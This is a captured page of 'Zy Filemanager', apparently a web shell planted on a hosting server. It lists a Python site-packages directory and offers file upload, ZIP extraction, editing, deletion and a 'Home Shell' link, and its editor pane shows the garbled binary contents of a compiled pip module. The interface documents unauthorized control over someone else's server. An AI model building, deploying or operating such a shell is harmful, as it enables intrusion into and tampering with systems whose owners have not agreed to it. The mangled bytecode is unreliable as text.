⚠️ BACKUP DATA ANDA SECARA TERATUR! File manager ini untuk keperluan teknis.
Zy Filemanager
berang berang bawa gelek berangkat lek !!!
🌙 Dark Mode
🏠 Home Shell
🔄 Refresh
Current Path:
Home Shell
/
opt
/
alt
/
python39
/
lib
/
python3.9
/
site-packages
/
pip
/
_vendor
/
pep517
/
in_process
/
__pycache__
⬆️ Parent Directory
📁 File Browser
Name
Size
Permissions
Modified Date
Actions
📄
__init__.cpython-39.pyc
(954 bytes)
954 B
0644
📅
✏️
✍️
⬇️
🗑️
📄
_in_process.cpython-39.pyc
(10,308 bytes)
10.07 KB
0644
📅
✏️
✍️
⬇️
🗑️
📤 Upload Files
Single File
Multiple Files
ZIP Extract
ZIP file will be deleted after extraction
➕ Create New
New Folder
New File
✍️ Editing: _in_process.cpython-39.pyc
File: /opt/alt/python39/lib/python3.9/site-packages/pip/_vendor/pep517/in_process/__pycache__/_in_process.cpython-39.pyc
Size: 10.07 KB | Last Modified: 2023-11-14 04:47:44
💾 Backup File
🔢 Toggle Line Numbers
a ��Re�+ � @ s| d Z ddlmZ ddlmZ ddlZddlZddlZddlmZ ddl Z ddl Z ddlZddlZej d dkr�dd� Zd d � Zndd� Zdd � ZG d d� de�ZG dd� de�ZG dd� de�Zdd� Zdd� Zdd� Zdd� Zdd� Zdd� Zdd � Zd!Zd"d#� Zd$d%� Zd&d'� Zd8d(d)�Zd9d*d+�Z d,d-� Z!G d.d/� d/e�Z"G d0d1� d1e�Z#d2d3� Z$h d4�Z%d5d6� Z&e'd7k�rxe&� dS ):ag This is invoked in a subprocess to call the build backend hooks. It expects: - Command line args: hook_name, control_dir - Environment variables: PEP517_BUILD_BACKEND=entry.point:spec PEP517_BACKEND_PATH=paths (separated with os.pathsep) - control_dir/input.json: - {"kwargs": {...}} Results: - control_dir/output.json - {"return_val": ...} � )�glob)� import_moduleN)�join� c K sF t |ddd��$}tj| |fi |�� W d � n1 s80 Y d S )N�w�utf-8��encoding��open�json�dump��obj�path�kwargs�f� r ��/builddir/build/BUILDROOT/alt-python39-pip-21.3.1-2.el8.x86_64/opt/alt/python39/lib/python3.9/site-packages/pip/_vendor/pep517/in_process/_in_process.py� write_json! s r c C s<